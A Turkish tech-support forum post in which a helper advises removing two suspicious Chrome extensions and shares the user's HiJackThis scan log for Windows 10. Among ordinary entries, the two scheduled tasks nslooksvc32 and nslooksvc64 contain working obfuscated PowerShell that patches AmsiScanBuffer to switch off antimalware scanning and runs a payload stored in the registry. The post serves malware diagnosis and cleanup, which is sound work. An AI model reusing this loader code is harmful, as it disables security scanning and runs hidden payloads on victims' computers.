Olmaz. Chrome'dan
Fishing.io ve
Safe Torrent Scanner adlı eklentileri kaldırın. Aşağıdaki raporu paylaşın sonrasında.
Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...
www.technopat.net
[CODE title="HiJackThis"]Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Platform: x64 Windows 10 (Pro), 10.0.19043.1526 (ReleaseId: 2009, 21H1), Service Pack: 0
Time: 06.03.2022 - 21:58 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: Yılmaz (group: Administrators) on DESKTOP-DU3LFJF, FirstRun: yes
Chrome: 96.0.4664.110
Firefox: 97.0.2.8098
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
1 C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
1 C:\Program Files\AMD\CNext\CNext\cncmd.exe
1 C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe
1 C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
1 C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
1 C:\Program Files\Riot Vanguard\vgc.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MpCopyAccelerator.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\MsMpEng.exe
1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2201.10-0\NisSrv.exe
6 C:\Users\muhan\AppData\Local\Discord\app-1.0.9004\Discord.exe
7 C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe
1 C:\Users\muhan\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\System32\amdfendrsr.exe
1 C:\Windows\System32\audiodg.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atieclxx.exe
1 C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\lsass.exe
4 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
70 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
1 C:\Windows\SysWOW64\dllhost.exe
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_51\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_51\bin\ssv.dll
O4 - HKCU\..\Run: [com.blitz.app] = C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe --autostart
O4 - HKCU\..\Run: [Discord] = C:\Users\muhan\AppData\Local\Discord\Update.exe --processStart Discord.exe
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/05/13)
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [RtkAudUService] = C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe -background
O17 - DHCP DNS 1: 192.168.1.1
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\Windows\explorer.exe
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1001 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Windows\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\Windows\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\Windows\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\Windows\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\Windows\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (disabled) googleupdatetaskmachinecore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: (disabled) googleupdatetaskmachineua - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Microsoft\Windows\Defrag\ScheduledDefrag - C:\Windows\system32\defrag.exe \\?\Volume{d1427864-26fc-4798-9271-6340f51fe19e}\ (Microsoft)
O22 - Task: \Mozilla\Firefox Background Update 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP
O22 - Task: AMDLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate
O22 - Task: AMDRyzenMasterSDKTask - C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: OneDrive Per-Machine Standalone Update Task - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
O22 - Task: OneDrive Reporting Task-S-1-5-21-1593825937-2386105780-1848293327-1005 - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-1058129444-4087973727-844704433-500 - C:\Users\muhan\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: Opera GX scheduled assistant Autoupdate 1620210764 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\muhan\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1618946092 - C:\Users\muhan\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe
O23 - Service R2: AMD Crash Defender Service - C:\Windows\System32\amdfendrsr.exe
O23 - Service R2: AMD External Events Utility - C:\Windows\System32\DriverStore\FileRepository\u0376724.inf_amd64_aa44b9d5e398e987\B376581\atiesrxx.exe
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_3dd75df32535321a\RtkAudUService64.exe
O23 - Service R2: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: FileSyncHelper - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\FileSyncHelper.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\96.0.4664.110\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Letasoft Sound Booster Service - (SoundBoosterService) - C:\Program Files (x86)\Letasoft Sound Booster\SoundBoosterService.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: OneDrive Updater Service - C:\Program Files\Microsoft OneDrive\22.022.0130.0001\OneDriveUpdaterService.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
Debug information:
- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc32.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc32.job - #0 LastDllError = 0
- 06.03.2022 21:58:01 - LoadFileToStream - #0 LastDllError = 225 () CreateFile C:\Windows\Tasks\nslooksvc64.job
- 06.03.2022 21:58:01 - ParseJob. Unable to open file: C:\Windows\Tasks\nslooksvc64.job - #0 LastDllError = 0
--
End of file - Time spent: 13,7 sec. - 32926 bytes, CRC32: FFFFFFFF. Sign: 䕥趉[/CODE]